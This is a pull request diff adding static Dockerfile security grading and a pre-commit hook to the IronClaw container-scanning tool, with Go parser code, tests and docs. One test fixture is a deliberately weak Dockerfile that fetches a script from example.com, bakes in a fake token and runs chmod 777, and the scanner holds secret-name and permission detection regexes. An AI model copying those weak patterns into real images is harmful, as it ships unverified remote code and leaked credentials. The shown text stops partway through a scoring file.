### PR TITLE
feat(scan): static Dockerfile posture grading + pre-commit hook (IRO-493, IRO-494)

### DIFF
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,0 +1,31 @@
+# IronClaw dogfoods its own Dockerfile containment hook (IRO-494): every commit
+# that touches a Dockerfile grades its authoring-time containment posture and
+# fails below grade B (--min-score=80). The three images we ship currently score
+# 92/A, 92/A, and 86/B, so this gate runs clean and catches a regression.
+#
+# This repo uses a `repo: local` hook wired to `go run ./cmd/ironctl` so it runs
+# against the working tree with only the Go toolchain (no release/network needed).
+# EXTERNAL consumers install the published hook instead — see .pre-commit-hooks.yaml:
+#
+#   repos:
+#     - repo: https://github.com/IronSecCo/ironclaw
+#       rev: v0.1.x
+#       hooks:
+#         - id: ironclaw-scan-dockerfile
+#           args: [--min-score=80]
+minimum_pre_commit_version: "3.0.0"
+repos:
+  - repo: local
+    hooks:
+      - id: ironclaw-scan-dockerfile
+        name: ironclaw scan --dockerfile (containment posture)
+        description: >-
+          Statically grade every committed Dockerfile's authoring-time containment
+          posture (non-root USER, pinned base, no baked-in secrets, COPY over remote
+          ADD, no world-writable files, HEALTHCHECK) and fail below grade B.
+        entry: go run ./cmd/ironctl scan --dockerfile
+        language: system
+        files: (?:(?:^|/)Dockerfile[^/]*|\.[Dd]ockerfile)$
+        types: [text]
+        pass_filenames: true
+        args: [--min-score=80]

--- a/.pre-commit-hooks.yaml
+++ b/.pre-commit-hooks.yaml
@@ -1,0 +1,29 @@
+# IronClaw pre-commit hooks — https://github.com/IronSecCo/ironclaw
+#
+# Shift-left container hardening. Grade a Dockerfile's authoring-time containment
+# posture (0-100 / A-F) on every commit: no daemon, no image pull, pure static
+# analysis. Install in any repo by adding this to its .pre-commit-config.yaml:
+#
+#   repos:
+#     - repo: https://github.com/IronSecCo/ironclaw
+#       rev: v0.1.x                     # pin a released tag
+#       hooks:
+#         - id: ironclaw-scan-dockerfile
+#           args: [--min-score=80]      # optional: fail the commit below grade B
+#
+# The hook builds the ironctl binary from source (language: golang), so no
+# separate install step is required. Run `pre-commit run ironclaw-scan-dockerfile
+# --all-files` to grade every Dockerfile in the repo.
+
+- id: ironclaw-scan-dockerfile
+  name: ironclaw scan --dockerfile (containment posture)
+  description: >-
+    Statically grade each committed Dockerfile's authoring-time containment
+    posture: non-root USER, pinned base image, no secrets baked into ENV/ARG,
+    COPY over remote/opaque ADD, no world-writable files, HEALTHCHECK, and layer
+    hygiene. Add args [--min-score=N] to fail the commit below a 0-100 threshold.
+  entry: ironctl scan --dockerfile
+  language: golang
+  files: (?:(?:^|/)Dockerfile[^/]*|\.[Dd]ockerfile)$
+  types: [text]
+  pass_filenames: true

--- a/README.md
+++ b/README.md
@@ -220,6 +220,14 @@ it cannot observe is scored insecure, never waved through.
 ironctl scan my-container
 ```
 
+It also grades a **Dockerfile** statically, at authoring or CI time, with no daemon and no
+image pull, so you catch a leaked credential, an unpinned base, or a root default in review
+instead of in production:
+
+```bash
+ironctl scan --dockerfile Dockerfile --min-score 80
+```
+
 A container started the usual way (root user, default caps, bridge network, `docker.sock`
 mounted in) grades **23/100, F**. An IronClaw `ic-sbx-*` session sandbox grades a clean
 **100/100, A**:

--- a/README.md
+++ b/README.md
@@ -228,6 +228,20 @@ instead of in production:
 ironctl scan --dockerfile Dockerfile --min-score 80
 ```
 
+Grade Dockerfiles automatically on every commit with the
+[pre-commit](https://pre-commit.com) hook, which builds `ironctl` from source, so
+there is nothing to install first:
+
+```yaml
+# .pre-commit-config.yaml
+repos:
+  - repo: https://github.com/IronSecCo/ironclaw
+    rev: v0.1.x
+    hooks:
+      - id: ironclaw-scan-dockerfile
+        args: [--min-score=80]   # fail the commit below grade B
+```
+
 A container started the usual way (root user, default caps, bridge network, `docker.sock`
 mounted in) grades **23/100, F**. An IronClaw `ic-sbx-*` session sandbox grades a clean
 **100/100, A**:

--- a/cmd/ironctl/scan.go
+++ b/cmd/ironctl/scan.go
@@ -39,6 +39,7 @@ func cmdScan(args []string) error {
 	compose := fs.String("compose", "", "grade a service in this docker-compose file")
 	service := fs.String("service", "", "compose service name (required if the file has >1 service)")
 	k8s := fs.String("k8s", "", "grade the first container in this Kubernetes pod/workload manifest")
+	dockerfile := fs.Bool("dockerfile", false, "statically grade the positional Dockerfile(s) authoring-time posture (daemon-free)")
 	runtime := fs.String("runtime", envOrDefault("IRONCTL_SCAN_RUNTIME", "auto"), "container runtime: auto|docker|podman|nerdctl")
 	dockerBin := fs.String("docker-bin", envOrDefault("DOCKER", "docker"), "docker binary used for `docker inspect`")
 	podmanBin := fs.String("podman-bin", envOrDefault("PODMAN", "podman"), "podman binary used for `podman inspect`")
@@ -72,6 +73,28 @@ func cmdScan(args []string) error {
 			bins:    runtimeBins{docker: *dockerBin, podman: *podmanBin, nerdctl: *nerdctlBin},
 			asJSON:  *asJSON,
 			md:      *md,
+		})
+	}
+
+	// --dockerfile: static, daemon-free posture grading of one or more Dockerfiles
+	// passed as positionals. It grades a DIFFERENT, authoring-time dimension set
+	// (see internal/host/scan/dockerfile.go) and uses its own scorer + SARIF
+	// renderer; the runtime --fix/--compare paths do not apply. Taking the files as
+	// positionals (not a --dockerfile=FILE value) lets a pre-commit hook append its
+	// matched filenames after fixed --min-score/--json args (IRO-494).
+	if *dockerfile {
+		if len(positional) == 0 {
+			scanUsage(os.Stderr)
+			return fmt.Errorf("scan --dockerfile needs at least one Dockerfile path")
+		}
+		return runDockerfileScan(dockerfileArgs{
+			paths:     positional,
+			asJSON:    *asJSON,
+			md:        *md,
+			badge:     *badge,
+			badgeJSON: *badgeJSON,
+			sarif:     *sarif,
+			minScore:  *minScore,
 		})
 	}
 
@@ -230,6 +253,103 @@ func runCompare(a compareArgs) error {
 	return nil
 }
 
+// dockerfileArgs carries the resolved inputs for a `scan --dockerfile` run. paths
+// holds one or more Dockerfile paths (a pre-commit hook appends every matched
+// file), each graded independently.
+type dockerfileArgs struct {
+	paths     []string
+	asJSON    bool
+	md        bool
+	badge     string
+	badgeJSON string
+	sarif     string
+	minScore  int
+}
+
+// runDockerfileScan grades each Dockerfile's authoring-time posture statically
+// (no daemon, no pull) and emits the requested representations. It reuses the
+// shared Report/table/json/md/badge paths and the Dockerfile-specific SARIF
+// renderer, and honors --min-score as a CI gate exactly like the live modes: the
+// gate trips (non-zero exit) if ANY graded file falls below the threshold, so a
+// pre-commit hook fails the commit on the first porous Dockerfile. The single
+// -artifact flags (--badge/--badge-json/--sarif) require exactly one path.
+func runDockerfileScan(a dockerfileArgs) error {
+	if len(a.paths) > 1 && (a.badge != "" || a.badgeJSON != "" || a.sarif != "") {
+		return fmt.Errorf("--badge/--badge-json/--sarif write a single artifact; pass one Dockerfile at a time with them (got %d)", len(a.paths))
+	}
+	var failed []string
+	for _, path := range a.paths {
+		raw, err := os.ReadFile(path)
+		if err != nil {
+			return fmt.Errorf("read Dockerfile: %w", err)
+		}
+		spec, err := scan.SpecFromDockerfile(raw, path)
+		if err != nil {
+			return err
+		}
+		report := scan.ScoreDockerfile(spec)
+		report.Version = version.String()
+		report.GeneratedAt = time.Now().UTC().Format(time.RFC3339)
+
+		if a.asJSON {
+			if err := scan.RenderJSON(os.Stdout, report); err != nil {
+				return err
+			}
+		} else {
+			scan.RenderTable(os.Stdout, report)
+		}
+		if a.md {
+			fmt.Fprintln(os.Stdout)
+			fmt.Fprint(os.Stdout, scan.RenderMarkdown(report))
+		}
+		if a.badge != "" {
+			if err := os.WriteFile(a.badge, []byte(scan.RenderBadgeSVG(report)), 0o644); err != nil {
+				return fmt.Errorf("write badge: %w", err)
+			}
+			if !a.asJSON {
+				fmt.Fprintf(os.Stdout, "  wrote badge: %s\n", a.badge)
+			}
+		}
+		if a.badgeJSON != "" {
+			if err := os.WriteFile(a.badgeJSON, []byte(scan.RenderBadgeEndpointJSON(report)), 0o644); err != nil {
+				return fmt.Errorf("write badge-json: %w", err)
+			}
+			if !a.asJSON {
+				fmt.Fprintf(os.Stdout, "  wrote shields endpoint badge: %s\n", a.badgeJSON)
+			}
+		}
+		if a.sarif != "" {
+			// SARIF is a best-effort side artifact: fail-open, never blocks the scan.
+			opts := scan.SARIFOptions{ConfigFile: path, AnchorLine: scan.AnchorLine(raw, "FROM")}
+			if err := writeDockerfileSARIF(a.sarif, report, opts); err != nil {
+				fmt.Fprintf(os.Stderr, "  warning: SARIF emit failed (scan result unaffected): %v\n", err)
+			} else if !a.asJSON {
+				fmt.Fprintf(os.Stdout, "  wrote SARIF: %s\n", a.sarif)
+			}
+		}
+		if a.minScore > 0 && report.Score < a.minScore {
+			failed = append(failed, fmt.Sprintf("%s (%d/100)", path, report.Score))
+		}
+	}
+	if len(failed) > 0 {
+		return fmt.Errorf("Dockerfile posture below the required %d: %s", a.minScore, strings.Join(failed, ", "))
+	}
+	return nil
+}
+
+// writeDockerfileSARIF renders the Dockerfile SARIF log to path, fail-open on error.
+func writeDockerfileSARIF(path string, r scan.Report, opts scan.SARIFOptions) error {
+	f, err := os.Create(path)
+	if err != nil {
+		return err
+	}
+	if err := scan.RenderSARIFDockerfile(f, r, opts); err != nil {
+		f.Close()
+		return err
+	}
+	return f.Close()
+}
+
 // writeSARIF renders the SARIF log for report r to path. It is separated so the
 // caller can fail-open on any error without leaking a half-written file into a
 // later step.
@@ -346,6 +466,7 @@ USAGE:
   ironctl scan <container>                    grade a running container (docker|podman|nerdctl)
   ironctl scan --compose FILE [--service N]   grade a docker-compose service
   ironctl scan --k8s FILE                     grade a Kubernetes pod/workload manifest
+  ironctl scan --dockerfile FILE...           grade Dockerfile(s) statically (no daemon, no pull)
   ironctl scan --compare A B                   diff two containers' isolation posture
 
 FLAGS:
@@ -373,5 +494,11 @@ IRO-429 scoring stays runtime-agnostic (no points for a runtime name).
 Dimensions graded: non-root user, dropped capabilities, seccomp, network
 isolation, read-only rootfs, docker.sock exposure, shared host namespaces.
 Unknown postures are graded fail-closed (as insecure).
+
+--dockerfile grades a DIFFERENT, authoring-time dimension set (non-root USER,
+pinned base image, no secrets in ENV/ARG, COPY over remote/opaque ADD, no
+world-writable files, HEALTHCHECK, layer hygiene). Runtime hardening (caps,
+seccomp, network, rootfs, docker.sock) is set at run time and is NOT expressible
+in a Dockerfile, so a high static grade still needs a runtime scan.
 `)
 }

--- a/cmd/ironctl/scan_test.go
+++ b/cmd/ironctl/scan_test.go
@@ -71,3 +71,41 @@ func TestCmdScan_NoTarget(t *testing.T) {
 		t.Error("expected an error when no target is given")
 	}
 }
+
+const cliHardenedDockerfile = `FROM gcr.io/distroless/static-debian12@sha256:abc123abc123abc123abc123abc123abc123abc123abc123abc123abc123abcd
+COPY --chown=65532:65532 app /app
+HEALTHCHECK CMD ["/app","--health"]
+USER 65532:65532
+ENTRYPOINT ["/app"]
+`
+
+const cliWeakDockerfile = `FROM ubuntu:latest
+ADD https://example.com/i.sh /tmp/i.sh
+ENV API_TOKEN=deadbeefsecret
+RUN chmod 777 /app
+`
+
+// The --dockerfile mode powers the pre-commit hook (IRO-494): files are passed as
+// positionals so a hook can append its matched filenames after fixed flags, and
+// --min-score fails the commit if ANY graded file is below the threshold.
+func TestCmdScan_DockerfileGate(t *testing.T) {
+	good := writeTemp(t, "Dockerfile.good", cliHardenedDockerfile)
+	if err := cmdScan([]string{"--dockerfile", good, "--min-score", "90"}); err != nil {
+		t.Errorf("hardened Dockerfile should pass min-score 90: %v", err)
+	}
+	bad := writeTemp(t, "Dockerfile.bad", cliWeakDockerfile)
+	// A batch containing a porous Dockerfile must trip the gate (the hook use case).
+	err := cmdScan([]string{"--dockerfile", good, bad, "--min-score", "90"})
+	if err == nil || !strings.Contains(err.Error(), "below") {
+		t.Errorf("a batch with a weak Dockerfile should fail min-score 90, got: %v", err)
+	}
+	if !strings.Contains(err.Error(), "Dockerfile.bad") {
+		t.Errorf("gate error should name the offending file, got: %v", err)
+	}
+}
+
+func TestCmdScan_DockerfileNoPath(t *testing.T) {
+	if err := cmdScan([]string{"--dockerfile"}); err == nil {
+		t.Error("expected an error when --dockerfile is given no path")
+	}
+}

--- a/docs/scan.md
+++ b/docs/scan.md
@@ -44,6 +44,9 @@ ironctl scan --compose docker-compose.yml --service web
 # grade a Kubernetes pod or workload manifest (Deployment, StatefulSet, ...)
 ironctl scan --k8s pod.yaml
 
+# grade a Dockerfile statically, at authoring/CI time (no daemon, no image pull)
+ironctl scan --dockerfile Dockerfile
+
 # force a specific runtime (default is auto-detect)
 ironctl scan --runtime podman my-container
 ```
@@ -62,6 +65,7 @@ inspect data, so probe-masking from inside the container cannot change the score
 | `nerdctl` / containerd | `nerdctl inspect` | Docker-compatible schema; containerd runtime handlers (for example `io.containerd.runsc.v1`) are recognized |
 | compose | `--compose FILE` | grades a service from the file, no runtime needed |
 | Kubernetes | `--k8s FILE` | grades a pod or workload manifest, no runtime needed |
+| Dockerfile | `--dockerfile FILE` | grades authoring-time posture statically, no daemon and no image pull (see below) |
 
 Selection and binaries:
 
@@ -93,6 +97,47 @@ When a container runs under a recognized strong-isolation runtime (gVisor /
 informational line. Scoring stays runtime-agnostic on purpose: a container can
 name a hardened runtime and still be misconfigured, so no points are awarded for
 the runtime name. The dimension scorers remain the authority on the score.
+
+## Grade a Dockerfile statically
+
+`--dockerfile FILE` grades a Dockerfile with no daemon and no image pull, so it
+runs at authoring time and in CI on a pull request, before anything is built. It
+opens the shift-left surface: catch a leaked credential, an unpinned base, or a
+root default in review instead of in production.
+
+```bash
+ironctl scan --dockerfile Dockerfile
+ironctl scan --dockerfile Dockerfile --min-score 80   # CI gate
+ironctl scan --dockerfile Dockerfile --sarif df.sarif # GitHub code scanning
+```
+
+It grades a different, authoring-time dimension set, the postures a Dockerfile
+author actually controls:
+
+| Dimension | Weight | What earns the points |
+|---|---|---|
+| Non-root USER | 25 | the final stage sets a non-root `USER` (a root default means every runtime escape starts as uid 0) |
+| Pinned base image | 20 | `FROM image@sha256:...` (a mutable tag scores partial; `:latest` fails) |
+| No secrets in ENV/ARG | 20 | no secret-like literal is baked into an `ENV`/`ARG` value |
+| COPY over remote/opaque ADD | 12 | no remote `ADD` (network fetch into a layer) or archive-extracting `ADD`; use `COPY` |
+| No world-writable files | 10 | no `chmod 777` / `o+w` |
+| HEALTHCHECK defined | 8 | a `HEALTHCHECK` so an orchestrator can spot a wedged container |
+| Layer / cache hygiene | 5 | package installs prune their cache in the same layer |
+
+### The honest static ceiling
+
+A static scan cannot see runtime hardening. Dropped capabilities, seccomp,
+`network=none`, a read-only rootfs, the docker.sock mount, and shared host
+namespaces are all set at `docker run` or orchestration time and are simply not
+expressible in a Dockerfile, so this mode does not grade them and never fakes a
+pass for them. A perfect 100/A Dockerfile is necessary but not sufficient: it
+still needs a runtime scan (`ironctl scan <container>`) to grade the isolation
+the file cannot express. Every Dockerfile scorecard prints this reminder.
+
+Multi-stage builds are supported: the final stage (the shipped image) is graded
+for its `USER`, base pin, and `HEALTHCHECK`, while secret and remote-fetch checks
+run across every stage. Full multi-stage dataflow analysis is out of scope; this
+mode grades containment posture, not general Dockerfile linting.
 
 ## Output formats
 

--- a/docs/scan.md
+++ b/docs/scan.md
@@ -139,6 +139,46 @@ for its `USER`, base pin, and `HEALTHCHECK`, while secret and remote-fetch check
 run across every stage. Full multi-stage dataflow analysis is out of scope; this
 mode grades containment posture, not general Dockerfile linting.
 
+## Use as a pre-commit hook
+
+The Dockerfile mode ships as a [pre-commit](https://pre-commit.com) hook, so every
+Dockerfile is graded automatically on commit, with no daemon and no image pull.
+Add this to any repo's `.pre-commit-config.yaml`:
+
+```yaml
+repos:
+  - repo: https://github.com/IronSecCo/ironclaw
+    rev: v0.1.x                     # pin a released tag
+    hooks:
+      - id: ironclaw-scan-dockerfile
+        args: [--min-score=80]      # optional: fail the commit below grade B
+```
+
+Then:
+
+```bash
+pre-commit install                                   # run on every commit
+pre-commit run ironclaw-scan-dockerfile --all-files  # grade every Dockerfile now
+```
+
+The hook uses `language: golang`, so pre-commit builds the `ironctl` binary from
+source in an isolated environment the first time it runs. No separate install step
+is required, and there is nothing to keep on your `PATH`.
+
+`args: [--min-score=N]` turns the hook into a gate: the commit fails if any matched
+Dockerfile scores below `N` on the 0 to 100 scale (the grade bands are A >= 90,
+B >= 75, C >= 50, D >= 25, F below). Omit `args` to run informationally: the
+scorecard still prints on every commit, but a low score never blocks it. When
+several Dockerfiles are staged, the hook grades each and fails on the first that
+falls below the threshold, naming it.
+
+By default the hook matches `Dockerfile`, `Dockerfile.*`, and `*.Dockerfile`
+anywhere in the tree. Override `files` in your config to narrow or widen that.
+
+IronClaw dogfoods this hook on its own repository. See its
+[`.pre-commit-config.yaml`](https://github.com/IronSecCo/ironclaw/blob/main/.pre-commit-config.yaml),
+which gates the three container images it ships at `--min-score=80`.
+
 ## Output formats
 
 | Flag | What you get |

--- a/internal/host/scan/dockerfile.go
+++ b/internal/host/scan/dockerfile.go
@@ -1,0 +1,395 @@
+package scan
+
+import (
+	"fmt"
+	"regexp"
+	"strings"
+)
+
+// --------------------------------------------------------------------------- //
+// Static Dockerfile posture grading (IRO-493).
+//
+// The live modes (docker/compose/k8s) grade a RUNNING or fully-specified
+// workload: they can see caps, seccomp, network mode, read-only rootfs, the
+// docker.sock mount, and shared host namespaces. A Dockerfile cannot. Those are
+// all `docker run` / orchestration-time knobs — statically UNDECIDABLE from the
+// build recipe alone. Grading a Dockerfile against them would either fail every
+// Dockerfile (useless) or fake a pass (dishonest).
+//
+// So this mode grades a DIFFERENT, authoring-time dimension set — the postures a
+// Dockerfile author actually controls: the shipped USER, base-image pinning,
+// secrets baked into ENV/ARG, remote/opaque ADD, world-writable permissions,
+// HEALTHCHECK, and layer/cache hygiene. It reuses the same Report/Dimension
+// types, 0-100/A-F bands, and every output path (table/json/md/badge/sarif).
+//
+// Honest ceiling: even a perfect 100/A Dockerfile says NOTHING about runtime
+// isolation. ScoreDockerfile always appends a note pointing the author at
+// `ironctl scan <container>` for the runtime posture the file cannot express.
+// --------------------------------------------------------------------------- //
+
+// DockerfileSpec is the normalized authoring-time posture extracted from a parsed
+// Dockerfile. Like Spec, it is source-agnostic evidence the pure scorers read;
+// the parser (SpecFromDockerfile) is the only thing that touches raw bytes.
+type DockerfileSpec struct {
+	Source string // always "dockerfile"
+	Target string // display name (file path or image), set by the caller
+	Stages int    // number of build stages (FROM count)
+
+	// --- shipped user (final stage) -----------------------------------------
+	// FinalUser is the last USER instruction in the FINAL build stage ("" = none
+	// declared, so the image defaults to whatever the base sets — usually root).
+	FinalUser string
+	// BaseLooksNonRoot is true when the final stage's base image reference itself
+	// advertises a non-root default (e.g. distroless ":nonroot"). Only consulted
+	// when the Dockerfile sets no explicit USER.
+	BaseLooksNonRoot bool
+
+	// --- base image pinning (final stage's external base) -------------------
+	BaseImage string // resolved external base ref of the final stage
+	// BasePin classifies the base tag: "digest" (@sha256), "tag" (explicit,
+	// mutable), "latest" (":latest" or implicit), "scratch", or "" (none/FROM
+	// unparsed).
+	BasePin string
+
+	// --- authoring signals (scanned across all stages) ----------------------
+	Healthcheck   bool     // HEALTHCHECK declared in the final stage
+	RemoteADD     []string // ADD <http(s)://...>: network fetch into a layer
+	LocalADD      []string // ADD <localpath>: tar auto-extract / COPY-in-disguise
+	Secrets       []string // ENV/ARG keys whose literal value looks like a secret
+	WorldWritable []string // chmod 777 / o+w occurrences (evidence)
+	DirtyPkg      []string // package installs that leave the cache in the layer
+
+	Notes []string
+}
+
+// dfLine is one logical Dockerfile instruction: the uppercased keyword and the
+// remainder (with line-continuations already joined).
+type dfLine struct {
+	instr string
+	args  string
+	stage int // 0-based build-stage index this instruction belongs to
+}
+
+// SpecFromDockerfile parses a Dockerfile and extracts its authoring-time posture.
+// name is the display target (the file path). Pure and unit-testable: it touches
+// no daemon, pulls no image, and reads no clock. A malformed file still returns a
+// best-effort spec (fail-closed on the signals it could not read) rather than an
+// error, so `scan --dockerfile` degrades gracefully.
+func SpecFromDockerfile(raw []byte, name string) (DockerfileSpec, error) {
+	lines := lexDockerfile(string(raw))
+	s := DockerfileSpec{Source: "dockerfile", Target: nz(name, "Dockerfile")}
+
+	// Map stage alias -> external base ref, and record the final stage index.
+	stageBase := map[string]string{} // lower(alias) -> base ref
+	var finalStage int
+	var finalStageBaseRef string
+	for _, l := range lines {
+		if l.instr == "FROM" {
+			ref, alias := parseFrom(l.args)
+			s.Stages++
+			finalStage = l.stage
+			finalStageBaseRef = ref
+			if alias != "" {
+				stageBase[strings.ToLower(alias)] = ref
+			}
+		}
+	}
+	if s.Stages == 0 {
+		return s, fmt.Errorf("no FROM instruction: not a Dockerfile")
+	}
+
+	// Resolve the final stage's ULTIMATE external base: follow FROM <prevstage>
+	// aliases until we hit a real image reference. Guard against cycles.
+	base := finalStageBaseRef
+	for i := 0; i < s.Stages; i++ {
+		next, ok := stageBase[strings.ToLower(base)]
+		if !ok || next == base {
+			break
+		}
+		base = next
+	}
+	s.BaseImage = base
+	s.BasePin = classifyPin(base)
+	s.BaseLooksNonRoot = baseLooksNonRoot(base)
+
+	// Walk instructions. USER/HEALTHCHECK are final-stage only (they shape the
+	// shipped image); ADD/RUN/ENV/ARG security signals are scanned across every
+	// stage (a build-time fetch or a baked secret is a risk wherever it appears).
+	for _, l := range lines {
+		switch l.instr {
+		case "USER":
+			if l.stage == finalStage {
+				if u := strings.TrimSpace(l.args); u != "" {
+					s.FinalUser = u
+				}
+			}
+		case "HEALTHCHECK":
+			if l.stage == finalStage && !strings.EqualFold(strings.TrimSpace(l.args), "NONE") {
+				s.Healthcheck = true
+			}
+		case "ADD":
+			src := firstArg(l.args)
+			if isRemoteRef(src) {
+				s.RemoteADD = append(s.RemoteADD, src)
+			} else if src != "" {
+				s.LocalADD = append(s.LocalADD, src)
+			}
+		case "ENV", "ARG":
+			for _, kv := range parseKeyVals(l.instr, l.args) {
+				if looksSecretKey(kv.key) && isLiteralSecret(kv.val) {
+					s.Secrets = append(s.Secrets, kv.key)
+				}
+			}
+		case "RUN":
+			if m := worldWritableRe.FindString(l.args); m != "" {
+				s.WorldWritable = append(s.WorldWritable, strings.TrimSpace(m))
+			}
+			if pkg := dirtyPackageInstall(l.args); pkg != "" {
+				s.DirtyPkg = append(s.DirtyPkg, pkg)
+			}
+		}
+	}
+	return s, nil
+}
+
+// --------------------------------------------------------------------------- //
+// Lexer
+// --------------------------------------------------------------------------- //
+
+// lexDockerfile turns raw Dockerfile text into logical instruction lines: it
+// joins backslash line-continuations, drops comment and blank lines, and tags
+// each instruction with its build-stage index (incremented at every FROM).
+func lexDockerfile(raw string) []dfLine {
+	var out []dfLine
+	var buf strings.Builder
+	stage := -1
+	flush := func() {
+		joined := strings.TrimSpace(buf.String())
+		buf.Reset()
+		if joined == "" {
+			return
+		}
+		fields := strings.SplitN(joined, " ", 2)
+		instr := strings.ToUpper(fields[0])
+		var args string
+		if len(fields) > 1 {
+			args = strings.TrimSpace(fields[1])
+		}
+		if instr == "FROM" {
+			stage++
+		}
+		st := stage
+		if st < 0 {
+			st = 0
+		}
+		out = append(out, dfLine{instr: instr, args: args, stage: st})
+	}
+	for _, line := range strings.Split(raw, "\n") {
+		trimmed := strings.TrimSpace(line)
+		// Skip comments / parser directives ONLY when not mid-continuation.
+		if buf.Len() == 0 && (trimmed == "" || strings.HasPrefix(trimmed, "#")) {
+			continue
+		}
+		// A line continues if it ends with a backslash (ignoring trailing space).
+		if strings.HasSuffix(strings.TrimRight(line, " \t"), "\\") {
+			cont := strings.TrimRight(line, " \t")
+			cont = strings.TrimSuffix(cont, "\\")
+			buf.WriteString(cont)
+			buf.WriteString(" ")
+			continue
+		}
+		buf.WriteString(line)
+		flush()
+	}
+	flush()
+	return out
+}
+
+// parseFrom extracts the image reference and optional stage alias from a FROM
+// argument, stripping flags like --platform=linux/amd64.
+func parseFrom(args string) (ref, alias string) {
+	fields := strings.Fields(args)
+	for i := 0; i < len(fields); i++ {
+		f := fields[i]
+		if strings.HasPrefix(f, "--") {
+			continue // --platform=… and friends
+		}
+		if ref == "" {
+			ref = f
+			continue
+		}
+		if strings.EqualFold(f, "AS") && i+1 < len(fields) {
+			alias = fields[i+1]
+			break
+		}
+	}
+	return ref, alias
+}
+
+// classifyPin grades how tightly a base image reference is pinned.
+func classifyPin(ref string) string {
+	r := strings.TrimSpace(ref)
+	if r == "" {
+		return ""
+	}
+	if strings.EqualFold(r, "scratch") {
+		return "scratch"
+	}
+	if strings.Contains(r, "@sha256:") || strings.Contains(r, "@sha512:") {
+		return "digest"
+	}
+	// Separate the tag from the ref, ignoring a registry-host ":port".
+	name := r
+	if at := strings.Index(name, "@"); at >= 0 {
+		name = name[:at]
+	}
+	lastColon := strings.LastIndex(name, ":")
+	lastSlash := strings.LastIndex(name, "/")
+	if lastColon > lastSlash { // a tag, not a registry port
+		tag := name[lastColon+1:]
+		if strings.EqualFold(tag, "latest") {
+			return "latest"
+		}
+		return "tag"
+	}
+	return "latest" // no tag => implicit :latest
+}
+
+// baseLooksNonRoot reports whether a base image reference itself advertises a
+// non-root default (distroless :nonroot, chainguard nonroot variants, …). Only a
+// hint; consulted only when the Dockerfile declares no explicit USER.
+func baseLooksNonRoot(ref string) bool {
+	return strings.Contains(strings.ToLower(ref), "nonroot")
+}
+
+// --------------------------------------------------------------------------- //
+// Instruction helpers
+// --------------------------------------------------------------------------- //
+
+func firstArg(args string) string {
+	// Skip leading --flags (e.g. ADD --chown=user).
+	for _, f := range strings.Fields(args) {
+		if strings.HasPrefix(f, "--") {
+			continue
+		}
+		return f
+	}
+	return ""
+}
+
+func isRemoteRef(s string) bool {
+	l := strings.ToLower(s)
+	return strings.HasPrefix(l, "http://") || strings.HasPrefix(l, "https://") ||
+		strings.HasPrefix(l, "git@") || strings.Contains(l, "github.com/")
+}
+
+type kv struct{ key, val string }
+
+// parseKeyVals extracts KEY=VALUE pairs from an ENV/ARG instruction. It handles
+// the `KEY=val KEY2=val2` form and the legacy `ENV KEY the rest is the value`
+// form. ARG with no value is a pure declaration (no pair emitted).
+func parseKeyVals(instr, args string) []kv {
+	args = strings.TrimSpace(args)
+	if args == "" {
+		return nil
+	}
+	// Legacy ENV form: `ENV KEY value with spaces` (no '=' before whitespace).
+	if instr == "ENV" && !strings.Contains(firstToken(args), "=") {
+		f := strings.SplitN(args, " ", 2)
+		if len(f) == 2 {
+			return []kv{{key: f[0], val: strings.TrimSpace(f[1])}}
+		}
+		return nil
+	}
+	var out []kv
+	for _, tok := range splitEnvTokens(args) {
+		eq := strings.Index(tok, "=")
+		if eq < 0 {
+			continue // ARG KEY (declaration only) or bare token
+		}
+		out = append(out, kv{key: tok[:eq], val: strings.Trim(tok[eq+1:], `"'`)})
+	}
+	return out
+}
+
+func firstToken(s string) string {
+	if i := strings.IndexAny(s, " \t"); i >= 0 {
+		return s[:i]
+	}
+	return s
+}
+
+// splitEnvTokens splits on whitespace but keeps quoted values together, so
+// `A="b c" D=e` yields ["A=\"b c\"", "D=e"].
+func splitEnvTokens(s string) []string {
+	var out []string
+	var cur strings.Builder
+	var quote rune
+	for _, r := range s {
+		switch {
+		case quote != 0:
+			cur.WriteRune(r)
+			if r == quote {
+				quote = 0
+			}
+		case r == '"' || r == '\'':
+			quote = r
+			cur.WriteRune(r)
+		case r == ' ' || r == '\t':
+			if cur.Len() > 0 {
+				out = append(out, cur.String())
+				cur.Reset()
+			}
+		default:
+			cur.WriteRune(r)
+		}
+	}
+	if cur.Len() > 0 {
+		out = append(out, cur.String())
+	}
+	return out
+}
+
+var secretKeyRe = regexp.MustCompile(`(?i)(pass(word|wd)?|secret|token|api[_-]?key|access[_-]?key|private[_-]?key|credential|_key$|^key$|auth[_-]?token)`)
+
+func looksSecretKey(key string) bool {
+	return secretKeyRe.MatchString(strings.TrimSpace(key))
+}
+
+// isLiteralSecret reports whether a value looks like an actual baked-in secret:
+// non-empty, not a build-arg reference ($FOO / ${FOO}), not an obvious empty
+// placeholder. A literal value in a secret-named key ships in the image layer /
+// build history — the heuristic the issue calls for.
+func isLiteralSecret(val string) bool {
+	v := strings.TrimSpace(val)
+	if v == "" {
+		return false
+	}
+	if strings.HasPrefix(v, "$") { // ${SECRET} / $SECRET: injected, not baked
+		return false
+	}
+	return true
+}
+
+var worldWritableRe = regexp.MustCompile(`chmod\s+(-[A-Za-z]+\s+)*(0?777|a\+w|o\+w|ugo\+w)`)
+
+// dirtyPackageInstall returns a short label when a RUN installs packages but
+// leaves the package cache in the layer (image bloat). Low-signal / low-weight.
+func dirtyPackageInstall(run string) string {
+	l := strings.ToLower(run)
+	switch {
+	case strings.Contains(l, "apt-get install") || strings.Contains(l, "apt install"):
+		if !strings.Contains(l, "rm -rf /var/lib/apt/lists") {
+			return "apt cache not pruned (rm -rf /var/lib/apt/lists/*)"
+		}
+	case strings.Contains(l, "apk add"):
+		if !strings.Contains(l, "--no-cache") && !strings.Contains(l, "rm -rf /var/cache/apk") {
+			return "apk cache not pruned (apk add --no-cache)"
+		}
+	case strings.Contains(l, "yum install") || strings.Contains(l, "dnf install"):
+		if !strings.Contains(l, "clean all") {
+			return "yum/dnf cache not pruned (&& yum clean all)"
+		}
+	}
+	return ""
+}

--- a/internal/host/scan/dockerfile_score.go
+++ b/internal/host/scan/dockerfile_score.go
@@ -1,0 +1,247 @@
+package scan
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"strings"
+)
+
+// dfScorer grades one authoring-time Dockerfile dimension. Mirrors the runtime
+// `scorer` shape but reads a DockerfileSpec. Every scorer is total for its
+// dimension (full points for a hardened posture, partial for weakened, zero for
+// insecure) and carries a concrete fix for the SARIF/remediation surface.
+type dfScorer struct {
+	key   string
+	title string
+	max   int
+	fix   string
